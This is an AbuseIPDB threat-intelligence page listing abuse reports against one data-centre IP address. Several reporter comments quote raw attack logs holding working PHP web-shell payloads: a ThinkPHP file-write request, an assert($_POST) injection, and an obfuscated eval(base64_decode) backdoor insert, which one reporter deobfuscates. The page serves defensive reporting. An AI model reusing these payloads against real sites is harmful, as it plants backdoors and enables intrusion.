JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 104.244.75.211

104.244.75.211 was found in our database!

This IP was reported 149 times. Confidence of Abuse is 0%: ?

ISP	BuyVM
Usage Type	Data Center/Web Hosting/Transit
ASN	AS53667
Domain Name	frantech.ca
Country	🇨🇭 Switzerland
City	Zurich, Zurich

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 104.244.75.211

Whois 104.244.75.211

IP Abuse Reports for 104.244.75.211:

This IP address has been reported a total of 149 times from 62 distinct sources. 104.244.75.211 was first reported on November 14th 2023, and the most recent report was 2 years ago.

Old Reports: The most recent abuse report for this IP address is from 2 years ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇮🇪 valeon	2023-12-14 13:37:45 (2 years ago)		Bad Web Bot Web App Attack
🇩🇪 niceshops.com	2023-12-14 13:27:53 (2 years ago)	many POST-Requests ([14/Dec/2023:14:27:51.645] //plus/ad_js.php?aid=8888 HTTP/1.1)	Web Spam Brute-Force Web App Attack
🇬🇧 Steve	2023-12-14 11:19:10 (2 years ago)	Too many 4xx responses in a short time	Brute-Force
🇬🇧 Bytemark	2023-12-14 07:34:56 (2 years ago)	104.244.75.211 - - [14/Dec/2023:07:34:54 +0000] "GET //?s=index/\\think\\template\\driver\\file/writ ... show more 104.244.75.211 - - [14/Dec/2023:07:34:54 +0000] "GET //?s=index/\\think\\template\\driver\\file/write&cacheFile=robots.php&content=xbshell1<?php$password%20=%20\"xinba\";$ch%20=%20explode(\".\",\"hello.ass.world.er.t\");array_intersect_ukey(array($_REQUEST[$password]%20=>%201),%20array(1),%20$ch[1].$ch[3].$ch[4]);?> HTTP/1.1" 200 63958 "https://www.distancelearningcentre.com//?s=index/\\think\\template\\driver\\file/write&cacheFile=robots.php&content=xbshell1<?php$password%20=%20\"xinba\";$ch%20=%20explode(\".\",\"hello.ass.world.er.t\");array_intersect_ukey(array($_REQUEST[$password]%20=>%201),%20array(1),%20$ch[1].$ch[3].$ch[4]);?>" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" show less	Brute-Force Web App Attack
Anonymous	2023-12-14 07:25:39 (2 years ago)	Excessive crawling/scraping	Hacking Brute-Force
🇫🇮 Christopher Hughes	2023-12-14 04:17:29 (2 years ago)	[Thu Dec 14 04:17:26.698277 2023] [proxy_fcgi:error] [pid 2509716:tid 140297824613952] [client 104.2 ... show more [Thu Dec 14 04:17:26.698277 2023] [proxy_fcgi:error] [pid 2509716:tid 140297824613952] [client 104.244.75.211:57097] AH01071: Got error 'Primary script unknown', referer: https://www.waterwaysworld.com//type.php?template=tag_(){};@unlink(FILE);print_r(xbshell);assert($_POST[1]);{//../rss [Thu Dec 14 04:17:28.147753 2023] [proxy_fcgi:error] [pid 2509716:tid 140297841399360] [client 104.244.75.211:57097] AH01071: Got error 'Primary script unknown', referer: https://www.waterwaysworld.com//robots1.php [Thu Dec 14 04:17:28.363835 2023] [proxy_fcgi:error] [pid 2509716:tid 140298504095296] [client 104.244.75.211:57097] AH01071: Got error 'Primary script unknown', referer: https://www.waterwaysworld.com//12345.php [Thu Dec 14 04:17:28.573076 2023] [proxy_fcgi:error] [pid 2509716:tid 140298487309888] [client 104.244.75.211:57097] AH01071: Got error 'Primary script unknown', referer: https://www.waterwaysworld.com//robots.php [Thu Dec 14 04:17:28.739640 2023] [proxy_fcgi:error] [pid 2509716:tid ... show less	Web App Attack
🇮🇩 Burayot	2023-12-14 03:46:46 (2 years ago)	LF_MODSEC: (mod_security) mod_security (id:949110) triggered by 104.244.75.211 (LU/Luxembourg/-): 2 ... show more LF_MODSEC: (mod_security) mod_security (id:949110) triggered by 104.244.75.211 (LU/Luxembourg/-): 2 in the last 3600 secs show less	Web App Attack
🇦🇺 MAGIC	2023-12-14 03:15:36 (2 years ago)	VM1 Bad user agents ignoring web crawling rules. Draing bandwidth	DDoS Attack Bad Web Bot
🇮🇪 RoboSOC	2023-12-14 01:03:28 (2 years ago)	ECShop Remote Code Execution Vulnerability , PTR: PTR record not found	Hacking
🇩🇪 niceshops.com	2023-12-14 00:26:55 (2 years ago)	many POST-Requests ([13/Dec/2023:20:07:55.027] //plus/90sec.php HTTP/1.1)	Web Spam Brute-Force Web App Attack
🇩🇪 stinpriza	2023-12-14 00:22:30 (2 years ago)	common Web Exploits being scanned	Web App Attack
Anonymous	2023-12-13 22:41:51 (2 years ago)	(apache-useragents) Failed apache-useragents trigger with match [redacted] from 104.244.75.211 (LU/L ... show more (apache-useragents) Failed apache-useragents trigger with match [redacted] from 104.244.75.211 (LU/Luxembourg/-) show less	Bad Web Bot
🇺🇸 jormaster3k	2023-12-13 18:59:32 (2 years ago)	Attack against Apache (too many 404s)	Web App Attack
Anonymous	2023-12-13 16:33:49 (2 years ago)	attempts at uploading malware	Web App Attack
🇺🇸 BlackM4sque	2023-12-13 16:05:52 (2 years ago)	Possible spoofed useragent, RCE. Many queries are PHP arrays of characters that spell out commands s ... show more Possible spoofed useragent, RCE. Many queries are PHP arrays of characters that spell out commands such as: cfg_dbprefixmytag` (aid,normbody) VALUES(9999,'<?php if(isset($_POST[''lemon''])){$a=strrev(''ecalper_gerp'');$b=strrev(''edoced_46esab'');$a(''/^/e'',$b(''ZXZhbChiYXNlNjRfZGVjb2RlKCRfUkVRVUVTVFt6MF0pKQ==''),0);}?>'); ---- Notice the strrev base64_encoded variable and preg_replace variable. The command in deobfuscated form would be: cfg_dbprefixmytag` (aid,normbody) VALUES(9999,'<?php if(isset($_POST[''lemon''])){$a=strrev(''ecalper_gerp'');$b=strrev(''edoced_46esab'');$preg_replace(''/^/e'',$base64_decode(''eval(base64_decode($_REQUEST[z0]))''),0);}?>'); show less	VPN IP Hacking Web App Attack

Showing 1 to 15 of 149 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇰🇷 193.123.248.135

🇺🇸 184.105.139.115

🇯🇴 176.29.173.41

🇺🇸 166.62.41.190

🇳🇱 164.92.211.134

🇺🇸 162.216.149.22

🇳🇱 45.148.10.147

🇺🇸 35.208.226.159

🇹🇷 31.145.131.202

🇨🇦 15.222.253.182

🇨🇳 8.148.152.95

🇮🇳 2404:6800:4000:101d::12e

🇧🇩 202.84.34.85

🇬🇧 193.163.125.45

🇫🇷 163.172.140.34

🇨🇮 154.0.30.137

🇺🇸 129.146.25.117

🇸🇬 119.74.30.85

🇳🇵 103.162.235.173

🇩🇪 95.85.238.209